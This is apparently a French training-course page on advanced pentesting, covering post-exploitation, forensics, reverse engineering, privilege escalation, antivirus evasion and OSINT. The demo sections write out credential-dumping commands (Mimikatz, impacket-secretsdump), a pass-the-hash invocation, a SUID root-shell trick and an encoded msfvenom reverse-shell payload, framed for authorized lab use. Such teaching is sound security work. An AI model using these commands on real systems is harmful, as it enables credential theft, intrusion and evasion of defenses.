Niveau Expert

Techniques Avancées & Spécialisation

Post-exploitation avancée, forensics, reverse engineering, et attaques de novo réseau

🏴 14 leçons

Post-Exploitation Avancée

Persistence, lateral movement, exfiltration de données, et Active Directory attacks

Pourquoi c'est important : En audit, la post-exploitation avec shells Meterpreter révèle l'impact réel : extraction de credentials, mouvement latéral et accès au contrôleur de domaine, bien au-delà de la preuve d'intrusion initiale.
L'analogie qui aide : Pensez à une planque installée dans la maison après y être entré : vous y cachez des copies de clés, un plan des pièces et une sortie discrète pour revenir sans forcer à nouveau.
Mimikatz BloodHound Impacket Cobalt Strike C2 Frameworks
01 Post-exploitation methodology
02 Mimikatz — extraction de credentials
03 Pass-the-Hash et Pass-the-Ticket
04 Lateral Movement techniques
05 Active Directory attacks
06 BloodHound — cartographie AD
07 Impacket — outils Python
08 Persistence — registry, scheduled tasks
09 Évasion de détection (Evasion)
10 Chiffrement C2 (Covenant, Sliver)
11 Data exfiltration techniques
12 Anti-forensics
13 OpSec pour pentesters
14 Projet : compromission AD complète
Démonstration pas à pas : Déroulez en lab : dans Meterpreter, load mimikatz charge l'extension, sekurlsa::logonpasswords lit les mots de passe en mémoire, puis impacket-secretsdump domaine/utilisateur:motdepasse@cible extrait SAM et LSA à distance. Chaque shell obtenu se documente avec sysinfo et getuid avant toute action.
Pièges classiques : Pièges : déclencher l'EDR avec Mimikatz en clair, perdre ses shells sans persistance documentée, ou exfiltrer des données réelles. Agissez uniquement en lab isolé, avec autorisation écrite et périmètre Active Directory dédié, car toute intrusion hors cadre relève de l'art. 323-1.
À vous de jouer : Que permet le Pass-the-Hash ?
Voir la réponse

Il réutilise un hash NTLM volé pour s'authentifier sans connaître le clair, par exemple avec impacket-psexec domaine/utilisateur@cible -hashes LM:NTLM, et prouve l'impact du vol de hashes.

🔍 12 leçons

Digital Forensics

Analyse forensique de disques, mémoire, réseaux, et volatilité

Pourquoi c'est important : En réponse à incident, la forensics révèle la chronologie exacte : comment l'attaquant est entré, ce qu'il a touché et ce qu'il a exfiltré. Sans méthode, aucune preuve n'est recevable.
L'analogie qui aide : Pensez au relevé d'empreintes : on photographie avant de toucher, on porte des gants et on scelle chaque sachet. L'image disque et son hash jouent ce rôle de scellé.
Autopsy Volatility FTK Imager Plaso Timeline
01 Méthodologie forensique
02 Acquisition de preuves (dd, FTK Imager)
03 Autopsy — analyse de disques
04 Analyse de systèmes de fichiers
05 Récupération de fichiers supprimés
06 Analyse de mémoire avec Volatility
07 Analyse de registre Windows
08 Forensics de navigateur web
09 Timeline analysis
10 Network forensics
11 Anti-forensiques et détection
12 Projet : enquête forensique complète
Démonstration pas à pas : Déroulez en lab forensics : dd if=/dev/sda of=/mnt/externe/image.dd bs=4M status=progress copie bit à bit, puis md5sum /dev/sda et md5sum image.dd doivent correspondre pour prouver l'intégrité. Analysez la mémoire avec volatility -f memory.raw --profile=Win7SP1x64 pslistpslist liste les processus et psxview trahit les processus cachés.
Pièges classiques : Pièges : analyser le disque d'origine au lieu de la copie, oublier le bloqueur en écriture, ou travailler sans journalisation. Manipulez uniquement des images de votre lab isolé et conservez chaque hash.
À vous de jouer : Pourquoi hasher l'image disque avec md5sum ou sha256sum ?
Voir la réponse

Le hash prouve que la copie est identique à l'original et qu'aucune altération n'a eu lieu pendant l'analyse, condition indispensable pour verser la preuve au rapport.

⚙️ 12 leçons

Reverse Engineering

Analyse de binaires, décompilation, debug, et désassemblage

Pourquoi c'est important : En audit malware, le reverse engineering révèle les appels malveillants cachés : domaines de commande, persistance et anti-analyse que l'antivirus n'a pas expliqués.
L'analogie qui aide : Pensez à démonter une serrure sur l'établi : vous notez chaque goupille et ressort sans forcer, jusqu'à comprendre quelle clé la fait tourner.
Ghidra Radare2 GDB IDA Pro FLOSS
01 Introduction au RE
02 Assembly x86/x64
03 Ghidra — décompilation
04 Radare2 — analyse de binaires
05 GDB — debugging
06 Analyse de malware statique
07 Analyse de malware dynamique
08 Conteneurs et sandboxing
09 Analyse de binaires ELF
10 Analyse de PE Windows
11 Désobfuscation et unpacking
12 Projet : analyse de malware réel
Démonstration pas à pas : Déroulez en lab : r2 -A ./binaire ouvre avec analyse, iz liste les chaînes, ii montre les imports d'API, puis pdf @main désassemble la fonction principale. Dans Ghidra, importez le binaire, lancez l'analyse automatique, double-cliquez sur main et renommez les variables pour lire la logique.
Pièges classiques : Piège majeur : exécuter le binaire suspect sur votre poste au lieu d'une sandbox ou d'une VM snapshots. Isolez le lab du réseau, figez un instantané avant chaque exécution, et ne sortez aucun échantillon.
À vous de jouer : Que révèle la table des imports d'un binaire ?
Voir la réponse

Elle liste les fonctions système appelées, par exemple écriture mémoire ou accès réseau, ce qui oriente l'analyse vers les comportements suspects à confirmer en décompilation.

👑 12 leçons

Escalade de Privilèges

Linux & Windows privesc, kernel exploits, SUID, et techniques avancées

Pourquoi c'est important : En audit, la privesc révèle si un simple compte volé devient administrateur : un binaire SUID ou une règle sudo mal écrite suffit à passer de www-data à root.
L'analogie qui aide : Pensez à l'échelle de service de l'immeuble : discrète et réservée au personnel, elle mène pourtant au toit. Les chemins SUID et cron sont cette échelle.
SUID/SGID Kernel exploits Sudo misconfigs Windows Tokens GTFOBins
01 Méthodologie d'escalade
02 Linux : enumerations (LinPEAS)
03 Linux : SUID/SGID binaries
04 Linux : sudo misconfigurations
05 Linux : kernel exploits
06 Linux : cron jobs et writable paths
07 Windows : enumerations (WinPEAS)
08 Windows : Token impersonation
09 Windows : Service exploits
10 Windows : Registry exploits
11 GTFOBins et LOLBAS
12 Projet : escalation complète
Démonstration pas à pas : Déroulez en lab privesc Linux : sudo -l liste vos droits sudo, find / -perm -4000 -type f 2>/dev/null liste les binaires SUID où -4000 filtre le bit SUID et 2>/dev/null masque les erreurs. Croisez chaque binaire avec GTFOBins : si find est SUID, find . -exec /bin/sh \; -quit donne un shell root de test.
Pièges classiques : Pièges : lancer un kernel exploit qui plante la VM, modifier un cron de production, ou tester hors snapshot. Figez un instantané de votre lab isolé avant chaque tentative et notez chaque commande pour le rollback.
À vous de jouer : Quelle commande liste les binaires SUID sur Linux ?
Voir la réponse

La commande find / -perm -4000 -type f 2>/dev/null affiche tous les fichiers avec le bit SUID, point de départ de toute recherche privesc Linux.

👻 10 leçons

Évasion d'Antivirus & Defenses

Bypass AV/EDR, offuscation de code, et techniques d'évasion avancées

Pourquoi c'est important : En mission Red Team, l'évasion révèle si l'EDR détecte vraiment : un payload naïf bloqué en une seconde prouve que la défense signature fonctionne, un contournement documenté prouve ses angles morts.
L'analogie qui aide : Pensez au déguisement : changer de manteau trompe un contrôle rapide, mais il faut aussi changer de démarche et d'accent pour passer un barrage attentif.
Veil Shellter AMSI bypass ETW patching Process Injection
01 Comment fonctionne les AV/EDR
02 Offuscation de payloads
03 Veil — génération de payloads
04 Shellter — injection dans des exécutables
05 AMSI bypass PowerShell
06 ETW patching
07 Process Injection techniques
08 Domain fronting et C2 over HTTPS
09 Living-off-the-land binaries
10 Lab : bypass complet AV/EDR
Démonstration pas à pas : Déroulez en lab : msfvenom -p windows/meterpreter/reverse_tcp LHOST=x -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe-e choisit l'encodeur et -i 10 répète dix passes. Testez contre votre EDR de lab, puis comparez avec une exécution en mémoire via C# pour mesurer ce que la seule offuscation apporte.
Pièges classiques : Pièges : croire que l'encodeur suffit face à l'heuristique moderne, ou envoyer son payload sur un service public qui le redistribue aux éditeurs. Testez uniquement en lab isolé hors ligne, avec échantillons marqués et autorisation écrite.
À vous de jouer : Pourquoi la détection par signature seule ne suffit-elle plus ?
Voir la réponse

Parce qu'un simple ré-encodage ou reconditionnement change le hash sans changer le comportement, d'où la bascule vers l'heuristique, l'AMSI et l'EDR comportemental.

🕵️ 10 leçons

OSINT — Renseignement Open Source

Recherche avancée, investigation digitale, et collecte de renseignement

Pourquoi c'est important : En audit, l'OSINT révèle la surface exposée avant le premier paquet : emails, sous-domaines et documents indexés qui serviront au spear phishing ou au password spray.
L'analogie qui aide : Pensez à fouiller les poubelles légales devant l'immeuble : prospectus, cartons et factures jetés racontent qui vit là, sans jamais entrer.
Maltego Recon-ng SpiderFoot Shodan theHarvester
01 Méthodologie OSINT
02 Google dorking avancé
03 theHarvester — collecte emails
04 Recon-ng — framework OSINT
05 Maltego — analyse de relations
06 Shodan — IoT et services exposés
07 SpiderFoot — automatisation
08 Investigation sur les réseaux sociaux
09 Géolocalisation et images
10 Projet OSINT complet
Démonstration pas à pas : Déroulez en lab : theharvester -d cible.com -b all-d fixe le domaine et -b all interroge toutes les sources pour emails et hôtes. Complétez avec shodan search hostname:cible.com pour les services exposés et exiftool photo.jpg pour lire GPS et appareil dans les métadonnées.
Pièges classiques : Pièges : harceler des personnes réelles, stocker des données personnelles sans base légale, ou confondre homonyme. Limitez-vous aux périmètres autorisés par écrit et aux comptes de test de votre lab isolé.
À vous de jouer : Que collecte theHarvester ?
Voir la réponse

Il collecte emails, sous-domaines, hôtes et adresses IP exposés publiquement pour un domaine, afin de nourrir la cartographie et le ciblage autorisé.